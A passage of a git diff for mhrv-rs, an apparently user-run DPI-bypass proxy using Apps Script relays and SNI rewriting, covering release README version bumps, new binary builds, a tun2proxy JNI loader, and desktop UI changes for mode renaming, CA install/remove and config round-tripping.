Issues that match a pattern get pattern-canonical replies (with specifics drawn from the user's actual log lines). Issues that don't match a pattern get individual attention. +3. **Substantive PRs first** — if a PR has tests passing and looks mergeable, merge it. Then your subsequent issue replies can reference "shipped in vX.Y.Z" instead of "queued for next release". +4. **Reply in batches but not as templates** — write each reply to address that user's specific log lines, config quirks, or terminology. Templated replies are easy to spot and erode trust. +5. **Close cleanly** — if an issue was a duplicate, close at the end of your reply with the close-comment pointing to canonical thread. If it's awaiting user verification, leave open with last comment from you. +6. **Cut releases when work lands** — don't accumulate fixes across multiple work sessions. Each session that lands user-visible code → one tag → one release. diff --git a/releases/README.md b/releases/README.md index d96ede6c..8ac0e1fa 100644 --- a/releases/README.md +++ b/releases/README.md @@ -2,11 +2,11 @@ This folder contains the prebuilt binaries from the latest release, committed directly to the repository for users who cannot reach the GitHub Releases page. 
-Current version: **v1.1.0** +Current version: **v1.9.1** | File | Platform | Contents | |---|---|---| -| `mhrv-rs-android-universal-v1.1.0.apk` | Android 7.0+ (all ABIs) | Universal APK — arm64-v8a, armeabi-v7a, x86_64, x86 in one file | +| `mhrv-rs-android-universal-v1.9.1.apk` | Android 7.0+ (all ABIs) | Universal APK — arm64-v8a, armeabi-v7a, x86_64, x86 in one file | | `mhrv-rs-linux-amd64.tar.gz` | Linux x86_64 | `mhrv-rs`, `mhrv-rs-ui`, `run.sh` | | `mhrv-rs-linux-arm64.tar.gz` | Linux aarch64 | `mhrv-rs`, `run.sh` (CLI only) | | `mhrv-rs-raspbian-armhf.tar.gz` | Raspberry Pi / ARMv7 hardfloat | `mhrv-rs`, `run.sh` (CLI only) | @@ -45,7 +45,7 @@ Extract `mhrv-rs-windows-amd64.zip`, then double-click `run.bat` inside the extr ### Android -Copy `mhrv-rs-android-universal-v1.1.0.apk` to your phone, tap it from the Files app, and allow "Install unknown apps" for whichever app is opening the APK (Files, Chrome, etc.). See [the Android guide](../docs/android.md) for the full walk-through of the first-run steps (Apps Script deployment, MITM CA install, VPN permission, SNI tester). +Copy `mhrv-rs-android-universal-v1.9.1.apk` to your phone, tap it from the Files app, and allow "Install unknown apps" for whichever app is opening the APK (Files, Chrome, etc.). See [the Android guide](../docs/android.md) for the full walk-through of the first-run steps (Apps Script deployment, MITM CA install, VPN permission, SNI tester). See the [main README](../README.md) for desktop setup (Apps Script deployment, config, browser proxy settings). @@ -55,7 +55,7 @@ See the [main README](../README.md) for desktop setup (Apps Script deployment, c این پوشه شامل فایل‌های آخرین نسخه است و مستقیماً در ریپو قرار گرفته برای کاربرانی که به صفحهٔ GitHub Releases دسترسی ندارند. 
-نسخهٔ فعلی: **v1.1.0** +نسخهٔ فعلی: **v1.9.1** ### دانلود از طریق ZIP @@ -73,6 +73,6 @@ cd mhrv-rs-macos-arm64 **ویندوز:** فایل `mhrv-rs-windows-amd64.zip` را extract کنید و داخل پوشه روی `run.bat` دو بار کلیک کنید (UAC را قبول کنید تا گواهی MITM نصب شود). -**اندروید:** فایل `mhrv-rs-android-universal-v1.1.0.apk` را روی گوشی کپی کنید، از Files app روی آن tap کنید و اجازهٔ "نصب برنامه‌های ناشناس" را بدهید. راهنمای کامل شروع به کار (دیپلوی Apps Script، نصب CA، اجازهٔ VPN، تستر SNI) در [راهنمای اندروید](../docs/android.md) هست. +**اندروید:** فایل `mhrv-rs-android-universal-v1.9.1.apk` را روی گوشی کپی کنید، از Files app روی آن tap کنید و اجازهٔ "نصب برنامه‌های ناشناس" را بدهید. راهنمای کامل شروع به کار (دیپلوی Apps Script، نصب CA، اجازهٔ VPN، تستر SNI) در [راهنمای اندروید](../docs/android.md) هست. برای راه‌اندازی کامل دسکتاپ (دیپلوی Apps Script، config، تنظیم proxy مرورگر) به [README اصلی](../README.md) مراجعه کنید. diff --git a/releases/mhrv-rs-android-arm64-v8a-v1.9.1.apk b/releases/mhrv-rs-android-arm64-v8a-v1.9.1.apk new file mode 100644 index 00000000..2127aadd Binary files /dev/null and b/releases/mhrv-rs-android-arm64-v8a-v1.9.1.apk differ diff --git a/releases/mhrv-rs-android-armeabi-v7a-v1.9.1.apk b/releases/mhrv-rs-android-armeabi-v7a-v1.9.1.apk new file mode 100644 index 00000000..94d79a65 Binary files /dev/null and b/releases/mhrv-rs-android-armeabi-v7a-v1.9.1.apk differ diff --git a/releases/mhrv-rs-android-universal-v1.1.0.apk b/releases/mhrv-rs-android-universal-v1.9.1.apk similarity index 79% rename from releases/mhrv-rs-android-universal-v1.1.0.apk rename to releases/mhrv-rs-android-universal-v1.9.1.apk index 417022c1..06ae5083 100644 Binary files a/releases/mhrv-rs-android-universal-v1.1.0.apk and b/releases/mhrv-rs-android-universal-v1.9.1.apk differ diff --git a/releases/mhrv-rs-android-x86-v1.9.1.apk b/releases/mhrv-rs-android-x86-v1.9.1.apk new file mode 100644 index 00000000..3a5e37d8 Binary files /dev/null and 
b/releases/mhrv-rs-android-x86-v1.9.1.apk differ diff --git a/releases/mhrv-rs-android-x86_64-v1.9.1.apk b/releases/mhrv-rs-android-x86_64-v1.9.1.apk new file mode 100644 index 00000000..7595d9d7 Binary files /dev/null and b/releases/mhrv-rs-android-x86_64-v1.9.1.apk differ diff --git a/releases/mhrv-rs-linux-amd64.tar.gz b/releases/mhrv-rs-linux-amd64.tar.gz index 30e2a7ff..16eb0f43 100644 Binary files a/releases/mhrv-rs-linux-amd64.tar.gz and b/releases/mhrv-rs-linux-amd64.tar.gz differ diff --git a/releases/mhrv-rs-linux-arm64.tar.gz b/releases/mhrv-rs-linux-arm64.tar.gz index 121f5b1e..39db1eca 100644 Binary files a/releases/mhrv-rs-linux-arm64.tar.gz and b/releases/mhrv-rs-linux-arm64.tar.gz differ diff --git a/releases/mhrv-rs-linux-musl-amd64.tar.gz b/releases/mhrv-rs-linux-musl-amd64.tar.gz index 87f3e8c5..28def085 100644 Binary files a/releases/mhrv-rs-linux-musl-amd64.tar.gz and b/releases/mhrv-rs-linux-musl-amd64.tar.gz differ diff --git a/releases/mhrv-rs-linux-musl-arm64.tar.gz b/releases/mhrv-rs-linux-musl-arm64.tar.gz index 53a75366..cf6ac5d2 100644 Binary files a/releases/mhrv-rs-linux-musl-arm64.tar.gz and b/releases/mhrv-rs-linux-musl-arm64.tar.gz differ diff --git a/releases/mhrv-rs-macos-amd64-app.zip b/releases/mhrv-rs-macos-amd64-app.zip index 6d371b1f..b1cbc5ec 100644 Binary files a/releases/mhrv-rs-macos-amd64-app.zip and b/releases/mhrv-rs-macos-amd64-app.zip differ diff --git a/releases/mhrv-rs-macos-amd64.tar.gz b/releases/mhrv-rs-macos-amd64.tar.gz index 46c62afb..539f66df 100644 Binary files a/releases/mhrv-rs-macos-amd64.tar.gz and b/releases/mhrv-rs-macos-amd64.tar.gz differ diff --git a/releases/mhrv-rs-macos-arm64-app.zip b/releases/mhrv-rs-macos-arm64-app.zip index cf5cf66b..ffdf979b 100644 Binary files a/releases/mhrv-rs-macos-arm64-app.zip and b/releases/mhrv-rs-macos-arm64-app.zip differ diff --git a/releases/mhrv-rs-macos-arm64.tar.gz b/releases/mhrv-rs-macos-arm64.tar.gz index c19d34d8..63094363 100644 Binary files 
a/releases/mhrv-rs-macos-arm64.tar.gz and b/releases/mhrv-rs-macos-arm64.tar.gz differ diff --git a/releases/mhrv-rs-openwrt-mipsel-softfloat.tar.gz b/releases/mhrv-rs-openwrt-mipsel-softfloat.tar.gz new file mode 100644 index 00000000..0b1f3698 Binary files /dev/null and b/releases/mhrv-rs-openwrt-mipsel-softfloat.tar.gz differ diff --git a/releases/mhrv-rs-raspbian-armhf.tar.gz b/releases/mhrv-rs-raspbian-armhf.tar.gz index 72726890..73b852d2 100644 Binary files a/releases/mhrv-rs-raspbian-armhf.tar.gz and b/releases/mhrv-rs-raspbian-armhf.tar.gz differ diff --git a/releases/mhrv-rs-windows-amd64.zip b/releases/mhrv-rs-windows-amd64.zip index baed0917..7fd3e9d1 100644 Binary files a/releases/mhrv-rs-windows-amd64.zip and b/releases/mhrv-rs-windows-amd64.zip differ diff --git a/src/android_jni.rs b/src/android_jni.rs index 6f467bec..91b4fa53 100644 --- a/src/android_jni.rs +++ b/src/android_jni.rs @@ -42,7 +42,7 @@ struct Running { rt: Option, /// Keep an Arc to the DomainFronter so `statsJson(handle)` can read the /// live stats without going through the async server. `None` for - /// google-only / full-only configs where the fronter isn't used. + /// direct / full-only configs where the fronter isn't used. fronter: Option>, } @@ -457,7 +457,7 @@ pub extern "system" fn Java_com_therealaleph_mhrv_Native_testSni<'a>( /// `Native.statsJson(long handle)` -> String. Returns a JSON blob with the /// live `StatsSnapshot` for a running proxy, or an empty string if the -/// handle is unknown or the proxy has no fronter (google_only / full modes). +/// handle is unknown or the proxy has no fronter (direct / full modes). /// /// Cheap — just reads a handful of atomics. The Kotlin UI polls this on a /// timer to render the "Usage today (estimated)" card. 
@@ -482,3 +482,53 @@ pub extern "system" fn Java_com_therealaleph_mhrv_Native_statsJson<'a>( })); env.new_string(out).map(|s| s.into_raw()).unwrap_or(std::ptr::null_mut()) } + +// --------------------------------------------------------------------------- +// tun2proxy CLI API wrapper (dlsym — no fork or patch needed) +// --------------------------------------------------------------------------- + +/// `Native.runTun2proxy(cliArgs, tunMtu)` -> int +/// +/// Calls `tun2proxy_run_with_cli_args` from libtun2proxy.so via dlsym. +/// This is the C API the tun2proxy maintainer recommends for callers that +/// need full CLI flexibility (e.g. --udpgw-server). BLOCKS until shutdown. +#[no_mangle] +pub extern "system" fn Java_com_therealaleph_mhrv_Native_runTun2proxy<'a>( + mut env: JNIEnv<'a>, + _class: JClass, + cli_args: JString, + tun_mtu: jni::sys::jint, +) -> jni::sys::jint { + safe(-1, AssertUnwindSafe(|| { + let args_str = jstring_to_string(&mut env, &cli_args); + tracing::info!("runTun2proxy: cli={}", args_str); + + unsafe { + use std::ffi::{CStr, CString}; + + let lib = CString::new("libtun2proxy.so").unwrap(); + let handle = libc::dlopen(lib.as_ptr(), libc::RTLD_NOW); + if handle.is_null() { + let err = CStr::from_ptr(libc::dlerror()); + tracing::error!("dlopen libtun2proxy.so failed: {:?}", err); + return -10; + } + + let sym = CString::new("tun2proxy_run_with_cli_args").unwrap(); + let func = libc::dlsym(handle, sym.as_ptr()); + if func.is_null() { + let err = CStr::from_ptr(libc::dlerror()); + tracing::error!("dlsym tun2proxy_run_with_cli_args: {:?}", err); + libc::dlclose(handle); + return -11; + } + + type RunFn = unsafe extern "C" fn(*const std::ffi::c_char, u16, bool) -> i32; + let run: RunFn = std::mem::transmute(func); + let c_args = CString::new(args_str).unwrap(); + let rc = run(c_args.as_ptr(), tun_mtu as u16, false); + libc::dlclose(handle); + rc + } + })) +} diff --git a/src/bin/ui.rs b/src/bin/ui.rs index 8409863b..5da12033 100644 --- 
a/src/bin/ui.rs +++ b/src/bin/ui.rs @@ -9,8 +9,8 @@ use tokio::runtime::Runtime; use tokio::sync::Mutex as AsyncMutex; use tokio::task::JoinHandle; -use mhrv_rs::cert_installer::install_ca; -use mhrv_rs::config::{Config, ScriptId}; +use mhrv_rs::cert_installer::{install_ca, reconcile_sudo_environment, remove_ca}; +use mhrv_rs::config::{Config, FrontingGroup, ScriptId}; use mhrv_rs::data_dir; use mhrv_rs::domain_fronter::{DomainFronter, DEFAULT_GOOGLE_SNI_POOL}; use mhrv_rs::mitm::{MitmCertManager, CA_CERT_FILE}; @@ -24,21 +24,38 @@ const LOG_MAX: usize = 200; fn main() -> eframe::Result<()> { let _ = rustls::crypto::ring::default_provider().install_default(); + // Re-point HOME at the invoking user if this binary was launched + // under sudo (see cert_installer::reconcile_sudo_environment). Must + // run before any data_dir / firefox_profile_dirs call. + reconcile_sudo_environment(); mhrv_rs::rlimit::raise_nofile_limit_best_effort(); let shared = Arc::new(Shared::default()); let (cmd_tx, cmd_rx) = std::sync::mpsc::channel::(); + // Load the user's saved form first so we can seed the tracing filter + // with their saved log level. Otherwise the form's log-level combobox + // would only ever take effect via env var or after Save → restart, and + // users on the UI binary (issue #401) reasonably expect the saved + // config.json `log_level` to apply at boot like it does for the CLI. + let (form, load_err) = load_form(); + let initial_toast = load_err.map(|e| (e, Instant::now())); + // Hook tracing events into the Recent log panel. Without this every // tracing::info! / debug! / trace! the proxy emits gets swallowed and // the panel only ever shows our manual push_log calls, making the log // level selector look useless (issue #12 bug 2). // - // The env-filter respects RUST_LOG if set, otherwise defaults to info - // so users see routing decisions immediately without any knob-turning. 
- // When they start the proxy and Save the config, the log level from the - // config is applied to the in-process filter (see on_start below). - install_ui_tracing(shared.clone()); + // Filter precedence (issue #401 fix in v1.8.2): + // 1. RUST_LOG env var if set — explicit override + // 2. Saved config's `log_level` (passed from form) — what users mean + // when they pick a level in the UI + // 3. "info,hyper=warn" — sensible default + // + // Save inside the running UI also installs the new filter via the + // reload handle (see `LOG_RELOAD` below), so users don't need to + // restart for a config change to take effect. + install_ui_tracing(shared.clone(), &form.log_level); let shared_bg = shared.clone(); std::thread::Builder::new() @@ -46,9 +63,6 @@ fn main() -> eframe::Result<()> { .spawn(move || background_thread(shared_bg, cmd_rx)) .expect("failed to spawn background thread"); - let (form, load_err) = load_form(); - let initial_toast = load_err.map(|e| (e, Instant::now())); - // Pick the renderer. Default is `glow` (OpenGL 2+) because that's // what we shipped through v1.0.x and it has the least binary-size // overhead. Users on older Windows boxes / RDP sessions / headless @@ -68,7 +82,11 @@ fn main() -> eframe::Result<()> { .with_inner_size([WIN_WIDTH, WIN_HEIGHT]) .with_min_inner_size([420.0, 400.0]) .with_title(format!("mhrv-rs {}", VERSION)), - renderer: if use_wgpu { eframe::Renderer::Wgpu } else { eframe::Renderer::Glow }, + renderer: if use_wgpu { + eframe::Renderer::Wgpu + } else { + eframe::Renderer::Glow + }, ..Default::default() }; @@ -116,6 +134,22 @@ struct UiState { /// Set while a download of a release asset is in flight. `None` when /// idle or after a completed download has been acknowledged. download_in_progress: bool, + /// Set while an install-or-remove cert op is in flight. 
Install and + /// Remove share this single flag so they can't race each other: + /// clicking Install → Remove back-to-back would otherwise leave the + /// final trust/file state dependent on thread scheduling — an + /// in-flight install could re-trust the CA after Remove had already + /// deleted it, or vice versa. Both UI buttons disable while this + /// is set, and both handlers gate-and-flip it. + cert_op_in_progress: bool, + /// Set synchronously when `Cmd::Start` is received by the background + /// thread, cleared synchronously when `Cmd::Stop` completes. Broader + /// than `running` (which only flips after the MITM manager has + /// finished loading). Used to block `Remove CA` during the window + /// between start-click and `running = true` — otherwise a queued + /// `Cmd::RemoveCa` could delete `ca/` while the server is partway + /// through loading the keypair into memory. + proxy_active: bool, /// One-line status of the most recent download (Ok(path) or Err(msg)). last_download: Option>, last_download_at: Option, @@ -139,6 +173,7 @@ enum Cmd { Stop, Test(Config), InstallCa, + RemoveCa, CheckCaTrusted, PollStats, /// Probe a single SNI against the given google_ip. Result is written @@ -181,9 +216,11 @@ struct App { #[derive(Clone)] struct FormState { - /// `"apps_script"` (default) or `"google_only"`. Controls whether the - /// Apps Script relay is wired up at all. In `google_only`, the form - /// tolerates an empty script_id / auth_key. + /// `"apps_script"` (default), `"direct"`, or `"full"`. Controls + /// whether the Apps Script relay is wired up at all. In `direct`, + /// the form tolerates an empty script_id / auth_key. + /// On load we normalize the legacy `"google_only"` string to + /// `"direct"` so the next save rewrites the on-disk config. 
mode: String, script_id: String, auth_key: String, @@ -209,11 +246,40 @@ struct FormState { show_log: bool, fetch_ips_from_api: bool, max_ips_to_scan: usize, - scan_batch_size:usize, + scan_batch_size: usize, google_ip_validation: bool, normalize_x_graphql: bool, youtube_via_relay: bool, passthrough_hosts: Vec, + /// Round-tripped from config.json so the UI's save path doesn't + /// drop the user's setting. Not currently exposed as a UI control; + /// users edit `block_quic` directly in `config.json` (Issue #213). + block_quic: bool, + /// Round-tripped from config.json. Not exposed as a UI control — + /// users edit `disable_padding` directly when needed (Issue #391). + /// Default false (padding active). + disable_padding: bool, + /// Round-tripped from config.json. Not exposed in the UI form yet — + /// the bypass-DoH default is the right answer for almost everyone + /// (DoH already encrypts, the tunnel was just adding latency), so + /// this is a config-only opt-out. See config.rs `tunnel_doh`. + tunnel_doh: bool, + /// User-supplied DoH hostnames added to the built-in default list, + /// round-tripped from config.json. See config.rs `bypass_doh_hosts`. + bypass_doh_hosts: Vec, + /// Multi-edge fronting groups. Round-tripped from config.json so + /// the UI's Save doesn't drop the user's hand-edited groups — + /// there is no UI editor for these yet, only file-edited config. + /// See config.rs `fronting_groups`. + fronting_groups: Vec, + /// Auto-blacklist tuning + per-batch timeout. Config-only knobs (no UI + /// fields yet — power-user file edit). Round-tripped through FormState + /// so Save preserves the user's hand-edited values. See config.rs + /// `auto_blacklist_*` and `request_timeout_secs`. 
+ auto_blacklist_strikes: u32, + auto_blacklist_window_secs: u64, + auto_blacklist_cooldown_secs: u64, + request_timeout_secs: u64, } #[derive(Clone, Debug)] @@ -254,7 +320,10 @@ fn load_form() -> (FormState, Option) { } } } else { - tracing::info!("config: no config found at {} — starting with defaults", path.display()); + tracing::info!( + "config: no config found at {} — starting with defaults", + path.display() + ); (None, None) }; let form = if let Some(c) = existing { @@ -268,8 +337,18 @@ fn load_form() -> (FormState, Option) { }, }; let sni_pool = sni_pool_for_form(c.sni_hosts.as_deref(), &c.front_domain); + // Normalize the legacy `google_only` mode string on load. The + // backend's `mode_kind()` accepts the alias forever, but storing + // it as `direct` in the form means the next Save rewrites the + // on-disk config to the new name — one-way migration, no warn + // on every startup. + let mode_normalized = if c.mode == "google_only" { + "direct".to_string() + } else { + c.mode.clone() + }; FormState { - mode: c.mode.clone(), + mode: mode_normalized, script_id: sid, auth_key: c.auth_key, google_ip: c.google_ip, @@ -286,13 +365,22 @@ fn load_form() -> (FormState, Option) { sni_custom_input: String::new(), sni_editor_open: false, show_log: true, - fetch_ips_from_api:c.fetch_ips_from_api, - max_ips_to_scan:c.max_ips_to_scan, + fetch_ips_from_api: c.fetch_ips_from_api, + max_ips_to_scan: c.max_ips_to_scan, google_ip_validation: c.google_ip_validation, - scan_batch_size:c.scan_batch_size, + scan_batch_size: c.scan_batch_size, normalize_x_graphql: c.normalize_x_graphql, youtube_via_relay: c.youtube_via_relay, passthrough_hosts: c.passthrough_hosts.clone(), + block_quic: c.block_quic, + disable_padding: c.disable_padding, + tunnel_doh: c.tunnel_doh, + bypass_doh_hosts: c.bypass_doh_hosts.clone(), + fronting_groups: c.fronting_groups.clone(), + auto_blacklist_strikes: c.auto_blacklist_strikes, + auto_blacklist_window_secs: c.auto_blacklist_window_secs, + 
auto_blacklist_cooldown_secs: c.auto_blacklist_cooldown_secs, + request_timeout_secs: c.request_timeout_secs, } } else { FormState { @@ -313,13 +401,24 @@ fn load_form() -> (FormState, Option) { sni_custom_input: String::new(), sni_editor_open: false, show_log: true, - fetch_ips_from_api:false, - max_ips_to_scan:100, - google_ip_validation:true, - scan_batch_size:500, + fetch_ips_from_api: false, + max_ips_to_scan: 100, + google_ip_validation: true, + scan_batch_size: 500, normalize_x_graphql: false, youtube_via_relay: false, passthrough_hosts: Vec::new(), + block_quic: false, + disable_padding: false, + tunnel_doh: true, + bypass_doh_hosts: Vec::new(), + fronting_groups: Vec::new(), + // Defaults match `default_auto_blacklist_*` and + // `default_request_timeout_secs` in src/config.rs. + auto_blacklist_strikes: 3, + auto_blacklist_window_secs: 30, + auto_blacklist_cooldown_secs: 120, + request_timeout_secs: 30, } }; (form, load_err) @@ -371,8 +470,10 @@ fn sni_pool_for_form(user: Option<&[String]>, front_domain: &str) -> Vec impl FormState { fn to_config(&self) -> Result { - let is_google_only = self.mode == "google_only"; - if !is_google_only { + // `direct` and the legacy `google_only` alias both run without + // an Apps Script relay, so neither requires a script_id. + let is_direct = self.mode == "direct" || self.mode == "google_only"; + if !is_direct { if self.script_id.trim().is_empty() { return Err("Apps Script ID is required".into()); } @@ -450,10 +551,10 @@ impl FormState { Some(active) } }, - fetch_ips_from_api:self.fetch_ips_from_api, + fetch_ips_from_api: self.fetch_ips_from_api, max_ips_to_scan: self.max_ips_to_scan, - google_ip_validation:self.google_ip_validation, - scan_batch_size:self.scan_batch_size, + google_ip_validation: self.google_ip_validation, + scan_batch_size: self.scan_batch_size, normalize_x_graphql: self.normalize_x_graphql, // UI form doesn't expose youtube_via_relay yet — it's a // config-only flag for now. 
Passed through from the loaded @@ -462,6 +563,36 @@ impl FormState { // Similarly config-only for now; round-trips through the // file so the UI doesn't drop the user's entries on save. passthrough_hosts: self.passthrough_hosts.clone(), + // Issue #213: block_quic is config-only for now (no UI + // control yet). Round-trip through the file so save + // doesn't drop a user-set true. + block_quic: self.block_quic, + // Issue #391: disable_padding is config-only for now. + // Round-trip preserves the user's choice. + disable_padding: self.disable_padding, + // DoH bypass is enabled-by-default with `tunnel_doh = false`. + // Round-trip the user's choice (and any extra hostnames they + // added) so save doesn't drop them. + tunnel_doh: self.tunnel_doh, + bypass_doh_hosts: self.bypass_doh_hosts.clone(), + // Multi-edge fronting groups: file-edited only for now, + // round-tripped through the UI so Save doesn't drop them. + fronting_groups: self.fronting_groups.clone(), + // PR #448 (Android): adaptive coalesce window. Desktop UI + // doesn't expose sliders for these yet (Android does), so + // we pass 0 to keep the compiled defaults (40ms step, + // 1000ms max). Round-trip planned for the v1.8.x desktop UI + // batch alongside the system-proxy toggle (#432). + coalesce_step_ms: 0, + coalesce_max_ms: 0, + // Auto-blacklist + batch timeout: config-only knobs (#391, + // #444, #430). Round-trip through FormState so Save doesn't + // drop hand-edited values. UI editor planned alongside the + // v1.8.x desktop UI batch. + auto_blacklist_strikes: self.auto_blacklist_strikes, + auto_blacklist_window_secs: self.auto_blacklist_window_secs, + auto_blacklist_cooldown_secs: self.auto_blacklist_cooldown_secs, + request_timeout_secs: self.request_timeout_secs, }) } } @@ -513,8 +644,33 @@ struct ConfigWire<'a> { max_ips_to_scan: usize, scan_batch_size: usize, google_ip_validation: bool, + /// Default false (= bypass DoH). 
Only emitted when explicitly true + /// so unchanged configs stay clean. + #[serde(skip_serializing_if = "is_false")] + tunnel_doh: bool, + #[serde(skip_serializing_if = "Vec::is_empty")] + bypass_doh_hosts: &'a Vec, + #[serde(skip_serializing_if = "Vec::is_empty")] + fronting_groups: &'a Vec, + /// Auto-blacklist tuning + batch timeout (#391, #444, #430). Skip + /// serialization when matching the historical defaults so unchanged + /// configs stay clean — only emitted when the user has explicitly + /// tuned them. + #[serde(skip_serializing_if = "is_default_strikes")] + auto_blacklist_strikes: u32, + #[serde(skip_serializing_if = "is_default_window_secs")] + auto_blacklist_window_secs: u64, + #[serde(skip_serializing_if = "is_default_cooldown_secs")] + auto_blacklist_cooldown_secs: u64, + #[serde(skip_serializing_if = "is_default_timeout_secs")] + request_timeout_secs: u64, } +fn is_default_strikes(v: &u32) -> bool { *v == 3 } +fn is_default_window_secs(v: &u64) -> bool { *v == 30 } +fn is_default_cooldown_secs(v: &u64) -> bool { *v == 120 } +fn is_default_timeout_secs(v: &u64) -> bool { *v == 30 } + fn is_false(b: &bool) -> bool { !*b } @@ -561,6 +717,13 @@ impl<'a> From<&'a Config> for ConfigWire<'a> { max_ips_to_scan: c.max_ips_to_scan, scan_batch_size: c.scan_batch_size, google_ip_validation: c.google_ip_validation, + tunnel_doh: c.tunnel_doh, + bypass_doh_hosts: &c.bypass_doh_hosts, + fronting_groups: &c.fronting_groups, + auto_blacklist_strikes: c.auto_blacklist_strikes, + auto_blacklist_window_secs: c.auto_blacklist_window_secs, + auto_blacklist_cooldown_secs: c.auto_blacklist_cooldown_secs, + request_timeout_secs: c.request_timeout_secs, } } } @@ -584,10 +747,7 @@ fn section(ui: &mut egui::Ui, title: &str, body: impl FnOnce(&mut egui::Ui)) { ui.add_space(2.0); let frame = egui::Frame::none() .fill(egui::Color32::from_rgb(28, 30, 34)) - .stroke(egui::Stroke::new( - 1.0, - egui::Color32::from_rgb(50, 54, 60), - )) + .stroke(egui::Stroke::new(1.0, 
egui::Color32::from_rgb(50, 54, 60))) .rounding(6.0) .inner_margin(egui::Margin::same(10.0)); frame.show(ui, body); @@ -596,10 +756,14 @@ fn section(ui: &mut egui::Ui, title: &str, body: impl FnOnce(&mut egui::Ui)) { /// A primary accent-filled button. Used for the headline action in a row /// (Start / Stop / SNI pool). fn primary_button(text: &str) -> egui::Button<'_> { - egui::Button::new(egui::RichText::new(text).color(egui::Color32::WHITE).strong()) - .fill(ACCENT) - .min_size(egui::vec2(120.0, 28.0)) - .rounding(4.0) + egui::Button::new( + egui::RichText::new(text) + .color(egui::Color32::WHITE) + .strong(), + ) + .fill(ACCENT) + .min_size(egui::vec2(120.0, 28.0)) + .rounding(4.0) } /// A compact form row: label on the left (fixed width for vertical alignment), @@ -697,19 +861,20 @@ impl eframe::App for App { // ── Section: Mode ───────────────────────────────────────────── // Surfacing the mode at the top of the form because it changes - // which of the sections below are actually used. google_only is - // a bootstrap mode for users who don't yet have internet access - // to deploy Code.gs — once deployed, they switch back to - // apps_script. + // which of the sections below are actually used. `direct` runs + // without the Apps Script relay (Google edge + any configured + // fronting_groups via the SNI-rewrite tunnel only) — useful as + // a bootstrap to deploy Code.gs, or as a standalone mode for + // users who only need access to fronting-group targets. section(ui, "Mode", |ui| { form_row(ui, "Mode", Some( "apps_script: DPI bypass via Apps Script relay (needs cert).\n\ full: tunnel ALL traffic through Apps Script + tunnel node (no cert needed).\n\ - google_only: bootstrap — direct SNI-rewrite tunnel to *.google.com only." + direct: SNI-rewrite tunnel only — no relay (Google edge + any fronting_groups)." 
), |ui| { egui::ComboBox::from_id_source("mode") .selected_text(match self.form.mode.as_str() { - "google_only" => "Google-only (bootstrap)", + "direct" | "google_only" => "Direct (no relay)", "full" => "Full tunnel (no cert)", _ => "Apps Script (MITM)", }) @@ -726,16 +891,16 @@ impl eframe::App for App { ); ui.selectable_value( &mut self.form.mode, - "google_only".into(), - "Google-only (bootstrap)", + "direct".into(), + "Direct (no relay)", ); }); }); - if self.form.mode == "google_only" { + if self.form.mode == "direct" || self.form.mode == "google_only" { ui.horizontal(|ui| { ui.add_space(120.0 + 8.0); ui.small(egui::RichText::new( - "Bootstrap mode — reach script.google.com to deploy Code.gs, then switch back to Apps Script.", + "Direct mode — SNI-rewrite tunnel only. Reach the Google edge (and any configured fronting_groups) without an Apps Script relay.", ) .color(OK_GREEN)); }); @@ -751,11 +916,11 @@ impl eframe::App for App { } }); - let google_only = self.form.mode == "google_only"; + let direct_mode = self.form.mode == "direct" || self.form.mode == "google_only"; // ── Section: Apps Script relay ──────────────────────────────── section(ui, "Apps Script relay", |ui| { - ui.add_enabled_ui(!google_only, |ui| { + ui.add_enabled_ui(!direct_mode, |ui| { form_row(ui, "Deployment IDs", Some( "One deployment ID per line. Proxy round-robins between them and sidelines \ any ID that hits its daily quota for 10 minutes before retrying." @@ -945,7 +1110,12 @@ impl eframe::App for App { ui.horizontal(|ui| { if ui.add(primary_button("Save config")).clicked() { match self.form.to_config().and_then(|c| save_config(&c)) { - Ok(p) => self.toast = Some((format!("Saved to {}", p.display()), Instant::now())), + Ok(p) => { + // Apply the new log level live so users don't have to + // restart for the combobox to take effect (#401). 
+ apply_log_level(&self.form.log_level); + self.toast = Some((format!("Saved to {}", p.display()), Instant::now())); + } Err(e) => self.toast = Some((format!("Save failed: {}", e), Instant::now())), } } @@ -1074,7 +1244,7 @@ impl eframe::App for App { ), ), ("bytes today", fmt_bytes(s.today_bytes)), - ("UTC day", s.today_key.clone()), + ("PT day", s.today_key.clone()), ("resets in", reset_str), ]; egui::Grid::new("usage_today") @@ -1209,9 +1379,54 @@ impl eframe::App for App { // Secondary actions — smaller, grouped together on their own line. ui.add_space(4.0); ui.horizontal(|ui| { - if ui.small_button("Install CA").clicked() { - let _ = self.cmd_tx.send(Cmd::InstallCa); - } + // Install CA and Remove CA share a single in-flight flag + // so back-to-back clicks can't race — an in-flight + // install would otherwise re-trust the CA after Remove + // deleted it (or vice versa). Both buttons disable when + // either op is running. + let (cert_op_in_flight, proxy_active) = { + let s = self.shared.state.lock().unwrap(); + (s.cert_op_in_progress, s.proxy_active) + }; + + let install_hover = if cert_op_in_flight { + "A cert install/remove is already in progress." + } else { + "Install the MITM CA into the OS trust store (and NSS if certutil \ + is available)." + }; + ui.add_enabled_ui(!cert_op_in_flight, |ui| { + if ui + .small_button("Install CA") + .on_hover_text(install_hover) + .clicked() + { + let _ = self.cmd_tx.send(Cmd::InstallCa); + } + }); + + let remove_hover = if proxy_active || running { + "Stop the proxy first — the CA keypair is held in memory by the \ + running MITM engine, and removing it now would break HTTPS for \ + every site until restart." + } else if cert_op_in_flight { + "A cert install/remove is already in progress." + } else { + "Remove the MITM CA from the OS trust store (verified by name) \ + and delete the on-disk ca/ directory. 
NSS cleanup (Firefox/Chrome) \ + is best-effort and logs a hint if certutil is missing or a browser \ + has the DB locked. A fresh CA is generated the next time you start \ + the proxy. Your config.json and the Apps Script deployment are NOT \ + touched — no need to redeploy Code.gs." + }; + ui.add_enabled_ui(!proxy_active && !running && !cert_op_in_flight, |ui| { + if ui.small_button("Remove CA") + .on_hover_text(remove_hover) + .clicked() + { + let _ = self.cmd_tx.send(Cmd::RemoveCa); + } + }); if ui.small_button("Check CA").clicked() { let _ = self.cmd_tx.send(Cmd::CheckCaTrusted); } @@ -1736,13 +1951,16 @@ fn background_thread(shared: Arc, rx: Receiver) { }); } } - // In background_thread function, modify the Cmd::Start handler: Ok(Cmd::Start(cfg)) => { if active.is_some() { push_log(&shared, "[ui] already running"); continue; } push_log(&shared, "[ui] starting proxy..."); + // Flip proxy_active synchronously so a `Remove CA` click + // queued in the same frame as Start is rejected before + // the MITM manager begins loading. + shared.state.lock().unwrap().proxy_active = true; let shared2 = shared.clone(); let fronter_slot: Arc>>> = Arc::new(AsyncMutex::new(None)); @@ 